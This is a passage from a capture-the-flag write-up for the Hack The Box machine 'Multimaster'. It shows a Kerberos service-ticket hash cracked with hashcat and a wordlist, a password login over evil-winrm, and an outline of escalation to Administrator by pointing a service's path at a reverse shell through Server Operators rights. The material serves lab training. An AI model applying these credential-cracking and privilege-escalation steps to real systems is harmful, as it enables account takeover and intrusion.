baa333ea999a98487c234984cb9d6527ae1626dac9a25c633332ee9f627e969b7d7374d1c330dbd306e335d8b8ca91130e407e32d7e3cecab2cde9b5648233ea4c10ac32ac39ca822aa1cfe6646a62fe2aece94b3c31a088d97007c26f48a13ee6399649cbde65337038deb924e043b839a88b79c008f60082c247fca073ca2cf5fb22868b1546a1af90b61b1d4a8d7ca4db457bdb9ef5fa9bd7b0341d21cb696af3b565ce357947fb40aba5a7fdd5ca9f2c92c9555fe09007572512bcd01f4fddf22ae3d9abe63c68a15c802b0e4a473c93eddd1c35c6d912643df04cab14ab764b729eae8a2ff33036fc1fa83d11f02e7ef8a5386296554df7d:rainforest786
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, TGS-REP
Hash.Target......: $krb5tgs$23$*UNKNOWN$UNKNOWN$nonexistent/BLAHBLAH*$...54df7d
Time.Started.....: Sat Sep 19 10:01:37 2020 (9 secs)
Time.Estimated...: Sat Sep 19 10:01:46 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   477.5 kH/s (12.10ms) @ Accel:64 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 4407296/14344385 (30.72%)
Rejected.........: 0/4407296 (0.00%)
Restore.Point....: 4399104/14344385 (30.67%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: rajalroo -> rageagaisntmachine

Started: Sat Sep 19 10:01:08 2020
Stopped: Sat Sep 19 10:01:48 2020

The hash is cracked for password rainforest786 now we can login as the user jorden to the server using winrm

┌──(codacker㉿kali)-[~/Workspace/HTB/boxes/Multimaster]                
└─$ evil-winrm -i 10.10.10.179 -u jorden -p 'rainforest786'              
                                                                                   
Evil-WinRM shell v2.3                                                              
                                                                                   
Info: Establishing connection to remote endpoint                         
                                                                                   
*Evil-WinRM* PS C:\Users\jorden\Documents> whoami /all                   
                                                                                   
USER INFORMATION                                                                   
----------------                                                                   

User Name       SID
=============== =============================================
megacorp\jorden S-1-5-21-3167813660-1240564177-918740779-3110

On further enumeration we find that the user jorden is a member of group Server Operators

images/Untitled%2011.png

which has permission to modify service registry hence we can modify service path of a service to a reverse shell and restart the service (for more info: https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services-registry-permissions)

images/Untitled%2012.png

to get a reverse shell as Administrator. Now we can get the root hash

images/Untitled%2013.png

Student

A passionate geek who loves to break stuff and then make it again, with interests in cloud infrastructure, network security, reverse engineering, malware analysis and exploit development. Codacker

Related